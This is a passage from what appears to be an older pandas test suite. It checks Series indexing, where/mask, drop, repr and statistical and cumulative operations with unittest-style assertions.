assert_almost_equal(result, expected)\n\n def test_basic_getitem_with_labels(self):\n indices = self.ts.index[[5, 10, 15]]\n\n result = self.ts[indices]\n expected = self.ts.reindex(indices)\n assert_series_equal(result, expected)\n\n result = self.ts[indices[0]:indices[2]]\n expected = self.ts.ix[indices[0]:indices[2]]\n assert_series_equal(result, expected)\n\n # integer indexes, be careful\n s = Series(np.random.randn(10), index=lrange(0, 20, 2))\n inds = [0, 2, 5, 7, 8]\n arr_inds = np.array([0, 2, 5, 7, 8])\n result = s[inds]\n expected = s.reindex(inds)\n assert_series_equal(result, expected)\n\n result = s[arr_inds]\n expected = s.reindex(arr_inds)\n assert_series_equal(result, expected)\n\n def test_basic_setitem_with_labels(self):\n indices = self.ts.index[[5, 10, 15]]\n\n cp = self.ts.copy()\n exp = self.ts.copy()\n cp[indices] = 0\n exp.ix[indices] = 0\n assert_series_equal(cp, exp)\n\n cp = self.ts.copy()\n exp = self.ts.copy()\n cp[indices[0]:indices[2]] = 0\n exp.ix[indices[0]:indices[2]] = 0\n assert_series_equal(cp, exp)\n\n # integer indexes, be careful\n s = Series(np.random.randn(10), index=lrange(0, 20, 2))\n inds = [0, 4, 6]\n arr_inds = np.array([0, 4, 6])\n\n cp = s.copy()\n exp = s.copy()\n s[inds] = 0\n s.ix[inds] = 0\n assert_series_equal(cp, exp)\n\n cp = s.copy()\n exp = s.copy()\n s[arr_inds] = 0\n s.ix[arr_inds] = 0\n assert_series_equal(cp, exp)\n\n inds_notfound = [0, 4, 5, 6]\n arr_inds_notfound = np.array([0, 4, 5, 6])\n self.assertRaises(Exception, s.__setitem__, inds_notfound, 0)\n self.assertRaises(Exception, s.__setitem__, arr_inds_notfound, 0)\n\n def test_ix_getitem(self):\n inds = self.series.index[[3, 4, 7]]\n assert_series_equal(self.series.ix[inds], self.series.reindex(inds))\n assert_series_equal(self.series.ix[5::2], self.series[5::2])\n\n # slice with indices\n d1, d2 = self.ts.index[[5, 15]]\n result = self.ts.ix[d1:d2]\n expected = self.ts.truncate(d1, d2)\n assert_series_equal(result, expected)\n\n # boolean\n mask = self.series > self.series.median()\n assert_series_equal(self.series.ix[mask], self.series[mask])\n\n # ask for index value\n self.assertEqual(self.ts.ix[d1], self.ts[d1])\n self.assertEqual(self.ts.ix[d2], self.ts[d2])\n\n def test_ix_getitem_not_monotonic(self):\n d1, d2 = self.ts.index[[5, 15]]\n\n ts2 = self.ts[::2][[1, 
2, 0]]\n\n self.assertRaises(KeyError, ts2.ix.__getitem__, slice(d1, d2))\n self.assertRaises(KeyError, ts2.ix.__setitem__, slice(d1, d2), 0)\n\n def test_ix_getitem_setitem_integer_slice_keyerrors(self):\n s = Series(np.random.randn(10), index=lrange(0, 20, 2))\n\n # this is OK\n cp = s.copy()\n cp.ix[4:10] = 0\n self.assertTrue((cp.ix[4:10] == 0).all())\n\n # so is this\n cp = s.copy()\n cp.ix[3:11] = 0\n self.assertTrue((cp.ix[3:11] == 0).values.all())\n\n result = s.ix[4:10]\n result2 = s.ix[3:11]\n expected = s.reindex([4, 6, 8, 10])\n\n assert_series_equal(result, expected)\n assert_series_equal(result2, expected)\n\n # non-monotonic, raise KeyError\n s2 = s.iloc[lrange(5) + lrange(5, 10)[::-1]]\n self.assertRaises(KeyError, s2.ix.__getitem__, slice(3, 11))\n self.assertRaises(KeyError, s2.ix.__setitem__, slice(3, 11), 0)\n\n def test_ix_getitem_iterator(self):\n idx = iter(self.series.index[:10])\n result = self.series.ix[idx]\n assert_series_equal(result, self.series[:10])\n\n def test_where(self):\n s = Series(np.random.randn(5))\n cond = s > 0\n\n rs = s.where(cond).dropna()\n rs2 = s[cond]\n assert_series_equal(rs, rs2)\n\n rs = s.where(cond, -s)\n assert_series_equal(rs, s.abs())\n\n rs = s.where(cond)\n assert(s.shape == rs.shape)\n assert(rs is not s)\n\n # test alignment\n cond = Series([True,False,False,True,False],index=s.index)\n s2 = -(s.abs())\n\n expected = s2[cond].reindex(s2.index[:3]).reindex(s2.index)\n rs = s2.where(cond[:3])\n assert_series_equal(rs, expected)\n\n expected = s2.abs()\n expected.ix[0] = s2[0]\n rs = s2.where(cond[:3], -s2)\n assert_series_equal(rs, expected)\n\n self.assertRaises(ValueError, s.where, 1)\n self.assertRaises(ValueError, s.where, cond[:3].values, -s)\n\n # GH 2745\n s = Series([1, 2])\n s[[True, False]] = [0, 1]\n expected = Series([0, 2])\n assert_series_equal(s, expected)\n\n # failures\n self.assertRaises(\n ValueError, s.__setitem__, tuple([[[True, False]]]), [0, 2, 3])\n self.assertRaises(\n ValueError, s.__setitem__, tuple([[[True, False]]]), [])\n\n # unsafe dtype changes\n for dtype in [np.int8, np.int16, np.int32, np.int64, np.float16, np.float32, np.float64]:\n s = Series(np.arange(10), dtype=dtype)\n mask = s < 5\n s[mask] = lrange(2, 7)\n expected = Series(lrange(2, 7) + lrange(5, 10), dtype=dtype)\n assert_series_equal(s, expected)\n self.assertEqual(s.dtype, expected.dtype)\n\n # these are allowed operations, but are upcasted\n for dtype in [np.int64, np.float64]:\n s = Series(np.arange(10), dtype=dtype)\n mask = s < 5\n values = [2.5, 3.5, 4.5, 5.5, 6.5]\n s[mask] = values\n expected = Series(values + lrange(5, 10), dtype='float64')\n assert_series_equal(s, expected)\n self.assertEqual(s.dtype, expected.dtype)\n\n # can't do these as we are forced to change the itemsize of the input\n # to something we cannot\n for dtype in [np.int8, np.int16, np.int32, np.float16, np.float32]:\n s = Series(np.arange(10), dtype=dtype)\n mask = s < 5\n values = [2.5, 3.5, 4.5, 5.5, 6.5]\n self.assertRaises(Exception, s.__setitem__, tuple(mask), values)\n\n # GH3235\n s = Series(np.arange(10), dtype='int64')\n mask = s < 5\n s[mask] = lrange(2, 7)\n expected = Series(lrange(2, 7) + lrange(5, 10), dtype='int64')\n assert_series_equal(s, expected)\n self.assertEqual(s.dtype, expected.dtype)\n\n s = Series(np.arange(10), dtype='int64')\n mask = s > 5\n s[mask] = [0] * 4\n expected = Series([0, 1, 2, 3, 4, 5] + [0] * 4, dtype='int64')\n assert_series_equal(s, expected)\n\n s = Series(np.arange(10))\n mask = s > 5\n def f():\n s[mask] = 
[5,4,3,2,1]\n self.assertRaises(ValueError, f)\n def f():\n s[mask] = [0] * 5\n self.assertRaises(ValueError, f)\n\n # dtype changes\n s = Series([1,2,3,4])\n result = s.where(s>2,np.nan)\n expected = Series([np.nan,np.nan,3,4])\n assert_series_equal(result, expected)\n\n # GH 4667\n # setting with None changes dtype\n s = Series(range(10)).astype(float)\n s[8] = None\n result = s[8]\n self.assertTrue(isnull(result))\n\n s = Series(range(10)).astype(float)\n s[s > 8] = None\n result = s[isnull(s)]\n expected = Series(np.nan,index=[9])\n assert_series_equal(result, expected)\n\n def test_where_setitem_invalid(self):\n\n # GH 2702\n # make sure correct exceptions are raised on invalid list assignment\n\n # slice\n s = Series(list('abc'))\n def f():\n s[0:3] = list(range(27))\n self.assertRaises(ValueError, f)\n\n s[0:3] = list(range(3))\n expected = Series([0,1,2])\n assert_series_equal(s.astype(np.int64), expected, )\n\n # slice with step\n s = Series(list('abcdef'))\n def f():\n s[0:4:2] = list(range(27))\n self.assertRaises(ValueError, f)\n\n s = Series(list('abcdef'))\n s[0:4:2] = list(range(2))\n expected = Series([0,'b',1,'d','e','f'])\n assert_series_equal(s, expected)\n\n # neg slices\n s = Series(list('abcdef'))\n def f():\n s[:-1] = list(range(27))\n self.assertRaises(ValueError, f)\n\n s[-3:-1] = list(range(2))\n expected = Series(['a','b','c',0,1,'f'])\n assert_series_equal(s, expected)\n\n # list\n s = Series(list('abc'))\n def f():\n s[[0,1,2]] = list(range(27))\n self.assertRaises(ValueError, f)\n\n s = Series(list('abc'))\n def f():\n s[[0,1,2]] = list(range(2))\n self.assertRaises(ValueError, f)\n\n # scalar\n s = Series(list('abc'))\n s[0] = list(range(10))\n expected = Series([list(range(10)),'b','c'])\n assert_series_equal(s, expected)\n\n def test_where_broadcast(self):\n # Test a variety of differently sized series\n for size in range(2, 6):\n # Test a variety of boolean indices\n for selection in [np.resize([True, False, False, False, False], size), # First element should be set\n # Set alternating elements]\n np.resize([True, False], size),\n np.resize([False], size)]: # No element should be set\n # Test a variety of different numbers as content\n for item in [2.0, np.nan, np.finfo(np.float).max, np.finfo(np.float).min]:\n # Test numpy arrays, lists and tuples as the input to be\n # broadcast\n for arr in [np.array([item]), [item], (item,)]:\n data = np.arange(size, dtype=float)\n s = Series(data)\n s[selection] = arr\n # Construct the expected series by taking the source\n # data or item based on the selection\n expected = Series([item if use_item else data[i]\n for i, use_item in enumerate(selection)])\n assert_series_equal(s, expected)\n\n def test_where_inplace(self):\n s = Series(np.random.randn(5))\n cond = s > 0\n\n rs = s.copy()\n\n rs.where(cond, inplace=True)\n assert_series_equal(rs.dropna(), s[cond])\n assert_series_equal(rs, s.where(cond))\n\n rs = s.copy()\n rs.where(cond, -s, inplace=True)\n assert_series_equal(rs, s.where(cond, -s))\n\n def test_where_dups(self):\n # GH 4550\n # where crashes with dups in index\n s1 = Series(list(range(3)))\n s2 = Series(list(range(3)))\n comb = pd.concat([s1,s2])\n result = comb.where(comb < 2)\n expected = Series([0,1,np.nan,0,1,np.nan],index=[0,1,2,0,1,2])\n assert_series_equal(result, expected)\n\n # GH 4548\n # inplace updating not working with dups\n comb[comb<1] = 5\n expected = Series([5,1,2,5,1,2],index=[0,1,2,0,1,2])\n assert_series_equal(comb, expected)\n\n comb[comb<2] += 10\n expected = 
Series([5,11,2,5,11,2],index=[0,1,2,0,1,2])\n assert_series_equal(comb, expected)\n\n def test_mask(self):\n s = Series(np.random.randn(5))\n cond = s > 0\n\n rs = s.where(cond, np.nan)\n assert_series_equal(rs, s.mask(~cond))\n\n def test_drop(self):\n\n # unique\n s = Series([1,2],index=['one','two'])\n expected = Series([1],index=['one'])\n result = s.drop(['two'])\n assert_series_equal(result,expected)\n result = s.drop('two', axis='rows')\n assert_series_equal(result,expected)\n\n # non-unique\n # GH 5248\n s = Series([1,1,2],index=['one','two','one'])\n expected = Series([1,2],index=['one','one'])\n result = s.drop(['two'], axis=0)\n assert_series_equal(result,expected)\n result = s.drop('two')\n assert_series_equal(result,expected)\n\n expected = Series([1],index=['two'])\n result = s.drop(['one'])\n assert_series_equal(result,expected)\n result = s.drop('one')\n assert_series_equal(result,expected)\n\n # single string/tuple-like\n s = Series(range(3),index=list('abc'))\n self.assertRaises(ValueError, s.drop, 'bc')\n self.assertRaises(ValueError, s.drop, ('a',))\n\n # bad axis\n self.assertRaises(ValueError, s.drop, 'one', axis='columns')\n\n # GH 8522\n s = Series([2,3], index=[True, False])\n self.assertTrue(s.index.is_object())\n result = s.drop(True)\n expected = Series([3],index=[False])\n assert_series_equal(result,expected)\n\n def test_ix_setitem(self):\n inds = self.series.index[[3, 4, 7]]\n\n result = self.series.copy()\n result.ix[inds] = 5\n\n expected = self.series.copy()\n expected[[3, 4, 7]] = 5\n assert_series_equal(result, expected)\n\n result.ix[5:10] = 10\n expected[5:10] = 10\n assert_series_equal(result, expected)\n\n # set slice with indices\n d1, d2 = self.series.index[[5, 15]]\n result.ix[d1:d2] = 6\n expected[5:16] = 6 # because it's inclusive\n assert_series_equal(result, expected)\n\n # set index value\n self.series.ix[d1] = 4\n self.series.ix[d2] = 6\n self.assertEqual(self.series[d1], 4)\n self.assertEqual(self.series[d2], 6)\n\n def test_where_numeric_with_string(self):\n # GH 9280\n s = pd.Series([1, 2, 3])\n w = s.where(s>1, 'X')\n\n self.assertFalse(com.is_integer(w[0]))\n self.assertTrue(com.is_integer(w[1]))\n self.assertTrue(com.is_integer(w[2]))\n self.assertTrue(isinstance(w[0], str))\n self.assertTrue(w.dtype == 'object')\n\n w = s.where(s>1, ['X', 'Y', 'Z'])\n self.assertFalse(com.is_integer(w[0]))\n self.assertTrue(com.is_integer(w[1]))\n self.assertTrue(com.is_integer(w[2]))\n self.assertTrue(isinstance(w[0], str))\n self.assertTrue(w.dtype == 'object')\n\n w = s.where(s>1, np.array(['X', 'Y', 'Z']))\n self.assertFalse(com.is_integer(w[0]))\n self.assertTrue(com.is_integer(w[1]))\n self.assertTrue(com.is_integer(w[2]))\n self.assertTrue(isinstance(w[0], str))\n self.assertTrue(w.dtype == 'object')\n\n def test_setitem_boolean(self):\n mask = self.series > self.series.median()\n\n # similiar indexed series\n result = self.series.copy()\n result[mask] = self.series * 2\n expected = self.series * 2\n assert_series_equal(result[mask], expected[mask])\n\n # needs alignment\n result = self.series.copy()\n result[mask] = (self.series * 2)[0:5]\n expected = (self.series * 2)[0:5].reindex_like(self.series)\n expected[-mask] = self.series[mask]\n assert_series_equal(result[mask], expected[mask])\n\n def test_ix_setitem_boolean(self):\n mask = self.series > self.series.median()\n\n result = self.series.copy()\n result.ix[mask] = 0\n expected = self.series\n expected[mask] = 0\n assert_series_equal(result, expected)\n\n def 
test_ix_setitem_corner(self):\n inds = list(self.series.index[[5, 8, 12]])\n self.series.ix[inds] = 5\n self.assertRaises(Exception, self.series.ix.__setitem__,\n inds + ['foo'], 5)\n\n def test_get_set_boolean_different_order(self):\n ordered = self.series.order()\n\n # setting\n copy = self.series.copy()\n copy[ordered > 0] = 0\n\n expected = self.series.copy()\n expected[expected > 0] = 0\n\n assert_series_equal(copy, expected)\n\n # getting\n sel = self.series[ordered > 0]\n exp = self.series[self.series > 0]\n assert_series_equal(sel, exp)\n\n def test_repr(self):\n str(self.ts)\n str(self.series)\n str(self.series.astype(int))\n str(self.objSeries)\n\n str(Series(tm.randn(1000), index=np.arange(1000)))\n str(Series(tm.randn(1000), index=np.arange(1000, 0, step=-1)))\n\n # empty\n str(self.empty)\n\n # with NaNs\n self.series[5:7] = np.NaN\n str(self.series)\n\n # with Nones\n ots = self.ts.astype('O')\n ots[::2] = None\n repr(ots)\n\n # various names\n for name in ['', 1, 1.2, 'foo', u('\\u03B1\\u03B2\\u03B3'),\n 'loooooooooooooooooooooooooooooooooooooooooooooooooooong',\n ('foo', 'bar', 'baz'),\n (1, 2),\n ('foo', 1, 2.3),\n (u('\\u03B1'), u('\\u03B2'), u('\\u03B3')),\n (u('\\u03B1'), 'bar')]:\n self.series.name = name\n repr(self.series)\n\n biggie = Series(tm.randn(1000), index=np.arange(1000),\n name=('foo', 'bar', 'baz'))\n repr(biggie)\n\n # 0 as name\n ser = Series(np.random.randn(100), name=0)\n rep_str = repr(ser)\n self.assertIn(\"Name: 0\", rep_str)\n\n # tidy repr\n ser = Series(np.random.randn(1001), name=0)\n rep_str = repr(ser)\n self.assertIn(\"Name: 0\", rep_str)\n\n ser = Series([\"a\\n\\r\\tb\"], name=[\"a\\n\\r\\td\"], index=[\"a\\n\\r\\tf\"])\n self.assertFalse(\"\\t\" in repr(ser))\n self.assertFalse(\"\\r\" in repr(ser))\n self.assertFalse(\"a\\n\" in repr(ser))\n\n # with empty series (#4651)\n s = Series([], dtype=np.int64, name='foo')\n self.assertEqual(repr(s), 'Series([], name: foo, dtype: int64)')\n\n s = Series([], dtype=np.int64, name=None)\n self.assertEqual(repr(s), 'Series([], dtype: int64)')\n\n def test_tidy_repr(self):\n a = Series([u(\"\\u05d0\")] * 1000)\n a.name = 'title1'\n repr(a) # should not raise exception\n\n def test_repr_bool_fails(self):\n s = Series([DataFrame(np.random.randn(2, 2)) for i in range(5)])\n\n import sys\n\n buf = StringIO()\n tmp = sys.stderr\n sys.stderr = buf\n try:\n # it works (with no Cython exception barf)!\n repr(s)\n finally:\n sys.stderr = tmp\n self.assertEqual(buf.getvalue(), '')\n\n def test_repr_name_iterable_indexable(self):\n s = Series([1, 2, 3], name=np.int64(3))\n\n # it works!\n repr(s)\n\n s.name = (u(\"\\u05d0\"),) * 2\n repr(s)\n\n def test_repr_should_return_str(self):\n # http://docs.python.org/py3k/reference/datamodel.html#object.__repr__\n # http://docs.python.org/reference/datamodel.html#object.__repr__\n # ...The return value must be a string object.\n\n # (str on py2.x, str (unicode) on py3)\n\n data = [8, 5, 3, 5]\n index1 = [u(\"\\u03c3\"), u(\"\\u03c4\"), u(\"\\u03c5\"), u(\"\\u03c6\")]\n df = Series(data, index=index1)\n self.assertTrue(type(df.__repr__() == str)) # both py2 / 3\n\n def test_repr_max_rows(self):\n # GH 6863\n with pd.option_context('max_rows', None):\n str(Series(range(1001))) # should not raise exception\n\n def test_unicode_string_with_unicode(self):\n df = Series([u(\"\\u05d0\")], name=u(\"\\u05d1\"))\n if compat.PY3:\n str(df)\n else:\n compat.text_type(df)\n\n def test_bytestring_with_unicode(self):\n df = Series([u(\"\\u05d0\")], name=u(\"\\u05d1\"))\n if 
compat.PY3:\n bytes(df)\n else:\n str(df)\n\n def test_timeseries_repr_object_dtype(self):\n index = Index([datetime(2000, 1, 1) + timedelta(i)\n for i in range(1000)], dtype=object)\n ts = Series(np.random.randn(len(index)), index)\n repr(ts)\n\n ts = tm.makeTimeSeries(1000)\n self.assertTrue(repr(ts).splitlines()[-1].startswith('Freq:'))\n\n ts2 = ts.ix[np.random.randint(0, len(ts) - 1, 400)]\n repr(ts2).splitlines()[-1]\n\n def test_timeseries_periodindex(self):\n # GH2891\n from pandas import period_range\n prng = period_range('1/1/2011', '1/1/2012', freq='M')\n ts = Series(np.random.randn(len(prng)), prng)\n new_ts = self.round_trip_pickle(ts)\n self.assertEqual(new_ts.index.freq, 'M')\n\n def test_iter(self):\n for i, val in enumerate(self.series):\n self.assertEqual(val, self.series[i])\n\n for i, val in enumerate(self.ts):\n self.assertEqual(val, self.ts[i])\n\n def test_keys(self):\n # HACK: By doing this in two stages, we avoid 2to3 wrapping the call\n # to .keys() in a list()\n getkeys = self.ts.keys\n self.assertIs(getkeys(), self.ts.index)\n\n def test_values(self):\n self.assert_numpy_array_equal(self.ts, self.ts.values)\n\n def test_iteritems(self):\n for idx, val in compat.iteritems(self.series):\n self.assertEqual(val, self.series[idx])\n\n for idx, val in compat.iteritems(self.ts):\n self.assertEqual(val, self.ts[idx])\n\n # assert is lazy (genrators don't define reverse, lists do)\n self.assertFalse(hasattr(self.series.iteritems(), 'reverse'))\n\n def test_sum(self):\n self._check_stat_op('sum', np.sum)\n\n def test_sum_inf(self):\n import pandas.core.nanops as nanops\n\n s = Series(np.random.randn(10))\n s2 = s.copy()\n\n s[5:8] = np.inf\n s2[5:8] = np.nan\n\n self.assertTrue(np.isinf(s.sum()))\n\n arr = np.random.randn(100, 100).astype('f4')\n arr[:, 2] = np.inf\n\n with cf.option_context(\"mode.use_inf_as_null\", True):\n assert_almost_equal(s.sum(), s2.sum())\n\n res = nanops.nansum(arr, axis=1)\n self.assertTrue(np.isinf(res).all())\n\n def test_mean(self):\n self._check_stat_op('mean', np.mean)\n\n def test_median(self):\n self._check_stat_op('median', np.median)\n\n # test with integers, test failure\n int_ts = Series(np.ones(10, dtype=int), index=lrange(10))\n self.assertAlmostEqual(np.median(int_ts), int_ts.median())\n\n def test_mode(self):\n s = Series([12, 12, 11, 10, 19, 11])\n exp = Series([11, 12])\n assert_series_equal(s.mode(), exp)\n\n assert_series_equal(Series([1, 2, 3]).mode(), Series([], dtype='int64'))\n\n lst = [5] * 20 + [1] * 10 + [6] * 25\n np.random.shuffle(lst)\n s = Series(lst)\n assert_series_equal(s.mode(), Series([6]))\n\n s = Series([5] * 10)\n assert_series_equal(s.mode(), Series([5]))\n\n s = Series(lst)\n s[0] = np.nan\n assert_series_equal(s.mode(), Series([6.]))\n\n s = Series(list('adfasbasfwewefwefweeeeasdfasnbam'))\n assert_series_equal(s.mode(), Series(['e']))\n\n s = Series(['2011-01-03', '2013-01-02', '1900-05-03'], dtype='M8[ns]')\n assert_series_equal(s.mode(), Series([], dtype=\"M8[ns]\"))\n s = Series(['2011-01-03', '2013-01-02', '1900-05-03', '2011-01-03',\n '2013-01-02'], dtype='M8[ns]')\n assert_series_equal(s.mode(), Series(['2011-01-03', '2013-01-02'],\n dtype='M8[ns]'))\n\n def test_prod(self):\n self._check_stat_op('prod', np.prod)\n\n def test_min(self):\n self._check_stat_op('min', np.min, check_objects=True)\n\n def test_max(self):\n self._check_stat_op('max', np.max, check_objects=True)\n\n def test_var_std(self):\n alt = lambda x: np.std(x, ddof=1)\n self._check_stat_op('std', alt)\n\n alt = lambda x: np.var(x, 
ddof=1)\n self._check_stat_op('var', alt)\n\n result = self.ts.std(ddof=4)\n expected = np.std(self.ts.values, ddof=4)\n assert_almost_equal(result, expected)\n\n result = self.ts.var(ddof=4)\n expected = np.var(self.ts.values, ddof=4)\n assert_almost_equal(result, expected)\n\n # 1 - element series with ddof=1\n s = self.ts.iloc[[0]]\n result = s.var(ddof=1)\n self.assertTrue(isnull(result))\n\n result = s.std(ddof=1)\n self.assertTrue(isnull(result))\n\n def test_sem(self):\n alt = lambda x: np.std(x, ddof=1)/np.sqrt(len(x))\n self._check_stat_op('sem', alt)\n\n result = self.ts.sem(ddof=4)\n expected = np.std(self.ts.values, ddof=4)/np.sqrt(len(self.ts.values))\n assert_almost_equal(result, expected)\n\n # 1 - element series with ddof=1\n s = self.ts.iloc[[0]]\n result = s.sem(ddof=1)\n self.assertTrue(isnull(result))\n\n def test_skew(self):\n tm._skip_if_no_scipy()\n\n from scipy.stats import skew\n alt = lambda x: skew(x, bias=False)\n self._check_stat_op('skew', alt)\n\n # test corner cases, skew() returns NaN unless there's at least 3 values\n min_N = 3\n for i in range(1, min_N + 1):\n s = Series(np.ones(i))\n df = DataFrame(np.ones((i, i)))\n if i < min_N:\n self.assertTrue(np.isnan(s.skew()))\n self.assertTrue(np.isnan(df.skew()).all())\n else:\n self.assertEqual(0, s.skew())\n self.assertTrue((df.skew() == 0).all())\n\n def test_kurt(self):\n tm._skip_if_no_scipy()\n\n from scipy.stats import kurtosis\n alt = lambda x: kurtosis(x, bias=False)\n self._check_stat_op('kurt', alt)\n\n index = MultiIndex(levels=[['bar'], ['one', 'two', 'three'], [0, 1]],\n labels=[[0, 0, 0, 0, 0, 0],\n [0, 1, 2, 0, 1, 2],\n [0, 1, 0, 1, 0, 1]])\n s = Series(np.random.randn(6), index=index)\n self.assertAlmostEqual(s.kurt(), s.kurt(level=0)['bar'])\n\n # test corner cases, kurt() returns NaN unless there's at least 4 values\n min_N = 4\n for i in range(1, min_N + 1):\n s = Series(np.ones(i))\n df = DataFrame(np.ones((i, i)))\n if i < min_N:\n self.assertTrue(np.isnan(s.kurt()))\n self.assertTrue(np.isnan(df.kurt()).all())\n else:\n self.assertEqual(0, s.kurt())\n self.assertTrue((df.kurt() == 0).all())\n\n def test_argsort(self):\n self._check_accum_op('argsort')\n argsorted = self.ts.argsort()\n self.assertTrue(issubclass(argsorted.dtype.type, np.integer))\n\n # GH 2967 (introduced bug in 0.11-dev I think)\n s = Series([Timestamp('201301%02d' % (i + 1)) for i in range(5)])\n self.assertEqual(s.dtype, 'datetime64[ns]')\n shifted = s.shift(-1)\n self.assertEqual(shifted.dtype, 'datetime64[ns]')\n self.assertTrue(isnull(shifted[4]))\n\n result = s.argsort()\n expected = Series(lrange(5), dtype='int64')\n assert_series_equal(result, expected)\n\n result = shifted.argsort()\n expected = Series(lrange(4) + [-1], dtype='int64')\n assert_series_equal(result, expected)\n\n def test_argsort_stable(self):\n s = Series(np.random.randint(0, 100, size=10000))\n mindexer = s.argsort(kind='mergesort')\n qindexer = s.argsort()\n\n mexpected = np.argsort(s.values, kind='mergesort')\n qexpected = np.argsort(s.values, kind='quicksort')\n\n self.assert_numpy_array_equal(mindexer, mexpected)\n self.assert_numpy_array_equal(qindexer, qexpected)\n self.assertFalse(np.array_equal(qindexer, mindexer))\n\n def test_reorder_levels(self):\n index = MultiIndex(levels=[['bar'], ['one', 'two', 'three'], [0, 1]],\n labels=[[0, 0, 0, 0, 0, 0],\n [0, 1, 2, 0, 1, 2],\n [0, 1, 0, 1, 0, 1]],\n names=['L0', 'L1', 'L2'])\n s = Series(np.arange(6), index=index)\n\n # no change, position\n result = s.reorder_levels([0, 1, 2])\n 
assert_series_equal(s, result)\n\n # no change, labels\n result = s.reorder_levels(['L0', 'L1', 'L2'])\n assert_series_equal(s, result)\n\n # rotate, position\n result = s.reorder_levels([1, 2, 0])\n e_idx = MultiIndex(levels=[['one', 'two', 'three'], [0, 1], ['bar']],\n labels=[[0, 1, 2, 0, 1, 2],\n [0, 1, 0, 1, 0, 1],\n [0, 0, 0, 0, 0, 0]],\n names=['L1', 'L2', 'L0'])\n expected = Series(np.arange(6), index=e_idx)\n assert_series_equal(result, expected)\n\n result = s.reorder_levels([0, 0, 0])\n e_idx = MultiIndex(levels=[['bar'], ['bar'], ['bar']],\n labels=[[0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0]],\n names=['L0', 'L0', 'L0'])\n expected = Series(range(6), index=e_idx)\n assert_series_equal(result, expected)\n\n result = s.reorder_levels(['L0', 'L0', 'L0'])\n assert_series_equal(result, expected)\n\n def test_cumsum(self):\n self._check_accum_op('cumsum')\n\n def test_cumprod(self):\n self._check_accum_op('cumprod')\n\n def test_cummin(self):\n self.assert_numpy_array_equal(self.ts.cummin(),\n np.minimum.accumulate(np.array(self.ts)))\n ts = self.ts.copy()\n ts[::2] = np.NaN\n result = ts.cummin()[1::2]\n expected = np.minimum.accumulate(ts.valid())\n\n self.assert_numpy_array_equal(result, expected)\n\n def test_cummax(self):\n self.assert_numpy_array_equal(self.ts.cummax(),\n np.maximum.accumulate(np.array(self.ts)))\n ts = self.ts.copy()\n ts[::2] = np.NaN\n result = ts.cummax()[1::2]\n expected = np.maximum.accumulate(ts.valid())\n\n self.assert_numpy_array_equal(result, expected)\n\n def test_cummin_datetime64(self):\n s = pd.Series(pd.to_datetime(\n ['NaT', '2000-1-2', 'NaT', '2000-1-1', 'NaT', '2000-1-3']))\n\n expected = pd.Series(pd.to_datetime(\n ['NaT', '2000-1-2', 'NaT', '2000-1-1', 'NaT', '2000-1-1']))\n result = s.cummin(skipna=True)\n self.assert_series_equal(expected, result)\n\n expected = pd.Series(pd.to_datetime(\n ['NaT', '2000-1-2', '2000-1-2', '2000-1-1', '2000-1-1', '2000-1-1']))\n result = s.cummin(skipna=False)\n self.assert_series_equal(expected, result)\n\n def test_cummax_datetime64(self):\n s = pd.Series(pd.to_datetime(\n ['NaT', '2000-1-2', 'NaT', '2000-1-1', 'NaT', '2000-1-3']))\n\n expected = pd.Series(pd.to_datetime(\n ['NaT', '2000-1-2', 'NaT', '2000-1-2', 'NaT', '2000-1-3']))\n result = s.cummax(skipna=True)\n self.assert_series_equal(expected, result)\n\n expected = pd.Series(pd.to_datetime(\n ['NaT', '2000-1-2', '2000-1-2', '2000-1-2', '2000-1-2', '2000-1-3']))\n result = s.cummax(skipna=False)\n self.assert_series_equal(expected, result)\n\n def test_cummin_timedelta64(self):\n s = pd.Series(pd.to_timedelta(\n ['NaT', '2 min', 'NaT', '1 min', 'NaT', '3 min', ]))\n\n expected = pd.Series(pd.to_timedelta(\n ['NaT', '2 min', 'NaT', '1 min', 'NaT', '1 min', ]))\n result = s.cummin(skipna=True)\n self.assert_series_equal(expected, result)\n\n expected = pd.Series(pd.to_timedelta(\n ['NaT', '2 min', '2 min', '1 min', '1 min', '1 min', ]))\n result = s.cummin(skipna=False)\n self.assert_series_equal(expected, result)\n\n def test_cummax_timedelta64(self):\n s = pd.Series(pd.to_timedelta(\n ['NaT', '2 min', 'NaT', '1 min', 'NaT', '3 min', ]))\n\n expected = pd.Series(pd.to_timedelta(\n ['NaT', '2 min', 'NaT', '2 min', 'NaT', '3 min', ]))\n result = s.cummax(skipna=True)\n self.assert_series_equal(expected, result)\n\n expected = pd.Series(pd.to_timedelta(\n ['NaT', '2 min', '2 min', '2 min', '2 min', '3 min', ]))\n result = s.cummax(skipna=False)\n self.assert_series_equal(expected, result)\n\n def test_npdiff(self):\n raise 
nose.SkipTest(\"skipping due to Series no longer being an \"\n \"ndarray\")\n\n # no longer works as the return type of np.diff is now nd.array\n s = Series(np.arange(5))\n\n r = np.diff(s)\n assert_series_equal(Series([nan, 0, 0, 0, nan]), r)\n\n def _check_stat_op(self, name, alternate, check_objects=False):\n import pandas.core.nanops as nanops\n\n def testit():\n f = getattr(Series, name)\n\n # add some NaNs\n self.series[5:15] = np.NaN\n\n # idxmax, idxmin, min, and max are valid for dates\n if name not in ['max','min']:\n ds = Series(date_range('1/1/2001', periods=10))\n self.assertRaises(TypeError, f, ds)\n\n # skipna or no\n self.assertTrue(notnull(f(self.series)))\n self.assertTrue(isnull(f(self.series, skipna=False)))\n\n # check the result is correct\n nona = self.series.dropna()\n assert_almost_equal(f(nona), alternate(nona.values))\n assert_almost_equal(f(self.series), alternate(nona.values))\n\n allna = self.series * nan\n self.assertTrue(np.isnan(f(allna)))\n\n # dtype=object with None, it works!\n s = Series([1, 2, 3, None, 5])\n f(s)\n\n # 2888\n l = [0]\n l.extend(lrange(2 ** 40, 2 ** 40+1000))\n s = Series(l, dtype='int64')\n assert_almost_equal(float(f(s)), float(alternate(s.values)))\n\n # check date range\n if check_objects:\n s = Series(bdate_range('1/1/2000', periods=10))\n res = f(s)\n exp = alternate(s)\n self.assertEqual(res, exp)\n\n # Invalid axis.\n self.assertRaises(ValueError, f, self.series, axis=1)\n\n # Unimplemented numeric_only parameter.\n if 'numeric_only' in getargspec(f).args:\n self.assertRaisesRegexp(NotImplementedError, name, f,\n self.series, numeric_only=True)\n\n testit()\n\n try:\n import bottleneck as bn\n nanops._USE_BOTTLENECK = False\n testit()\n nanops._USE_BOTTLENECK = True\n except ImportError:\n pass\n\n def _check_accum_op(self, name):\n func = getattr(np, name)\n self.assert_numpy_array_equal(func(self.ts), func(np.array(self.ts)))\n\n # with missing values\n ts = self.ts.copy()\n ts[::2] = np.NaN\n\n 